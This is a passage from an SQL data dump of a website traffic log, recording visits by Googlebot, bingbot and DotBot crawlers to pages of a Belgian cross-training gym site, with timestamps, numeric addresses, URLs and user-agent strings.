(78014, 1532510133.729585, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78015, 1532588761.714986, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78016, 1532604914.014828, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78017, 1532738045.930176, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78018, 1532739376.435928, 1123634076, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78019, 1532739409.703792, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78020, 1532739459.671252, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78021, 1532739556.126795, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78022, 1532739610.697836, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78023, 1532739701.140925, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78024, 1532750574.478093, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78025, 1532839696.473636, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78026, 1532839696.958686, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78027, 1532847616.129402, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78028, 1532853430.841475, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78029, 1532867183.267819, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78030, 1532894704.307407, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78031, 1532898018.579318, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78032, 1532906888.207610, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78033, 1532913935.968408, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78034, 1532932658.008750, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78035, 1532932658.510728, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78036, 1532932659.518681, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78037, 1532940800.446450, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78038, 1532961840.544441, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78039, 1532989037.385994, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78040, 1533468453.195965, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78041, 1533468453.714866, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78042, 1533481574.641591, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78043, 1533499275.882110, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78044, 1533524168.619794, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78045, 1533561504.229384, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78046, 1533561504.742132, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78047, 1533687066.380772, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78048, 1533687066.887890, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78049, 1533720663.736773, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78050, 1533839299.582940, 2637637509, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78051, 1533842311.491901, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78052, 1533843029.978315, 2637637446, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78053, 1534166716.963871, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78054, 1534166717.535925, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78055, 1534411609.355022, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78056, 1534411609.850829, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78057, 1534418319.164567, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78058, 1534441490.377798, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78059, 1534445105.827889, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78060, 1534450929.848358, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78061, 1534454791.622770, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78062, 1534460252.116279, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78063, 1534465103.325369, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78064, 1534948081.878384, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78065, 1534948082.450468, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78066, 1534955281.230993, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78067, 1534962480.297984, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78068, 1534969738.906489, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78069, 1534973814.948193, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78070, 1534981455.496673, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78071, 1534981456.267742, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78072, 1535468881.877852, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78073, 1535468882.562586, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78074, 1535476087.500621, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78075, 1535480913.702968, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78076, 1535480914.239535, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78077, 1535487499.794482, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78078, 1535488972.012639, 3639886537, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78079, 1535506394.684184, 2637637376, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78080, 1535507791.329440, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78081, 1535508048.851770, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78082, 1535508556.187902, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78083, 1535508796.621223, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78084, 1535509151.137583, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78085, 1535509343.499990, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78086, 1535509483.032066, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78087, 1535509606.619037, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78088, 1536021535.430585, 3475901769, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78089, 1536050507.749802, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78090, 1536050508.239154, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78091, 1536050594.303164, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78092, 1536203685.347451, 3475901769, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78093, 1536227056.457539, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78094, 1536227056.937333, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78095, 1536265223.725091, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78096, 1536402803.388628, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78097, 1536402803.967143, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78098, 1536685035.662157, 1123631772, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78099, 1536685036.221426, 1123631772, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/sutzvmzdesfovj.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78100, 1536746073.673872, 3475901893, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78101, 1536770082.915091, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78102, 1536771485.388845, 2637637470, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78103, 1536838150.463458, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78104, 1536838150.932705, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78105, 1537074147.387508, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78106, 1537074147.839611, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78107, 1537087955.600320, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78108, 1537091102.561705, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78109, 1537108083.977704, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78110, 1537117752.793443, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78111, 1537123740.927264, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
